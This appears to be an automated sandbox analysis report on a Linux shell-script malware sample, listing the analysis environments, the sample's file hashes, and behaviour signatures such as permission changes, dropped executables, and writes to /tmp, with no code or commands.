Analysis
-
max time kernel
9s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
18/10/2024, 02:47
Static task
static1
Behavioral task
behavioral1
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
-
Size
10KB
-
MD5
60c5521dc77c48a75842ba0dbc3fae7c
-
SHA1
9ddfd137b35be8207eb3889a9a93c23ce142e184
-
SHA256
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490
-
SHA512
da9d12e38093b4ed8181f08e6e568d784d062e018ee58f085668c97a33254dcbf2a1dbe9b2ac4098817bfa045b661fb905ef37999c6fe3019ca1e504eb192d6c
-
SSDEEP
192:jorwWDEg9skLEcnrq/7DlhMYDgAiSEg9sk+zjnrq/7DPMYDgAiA:juwWpEt9EdKKA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97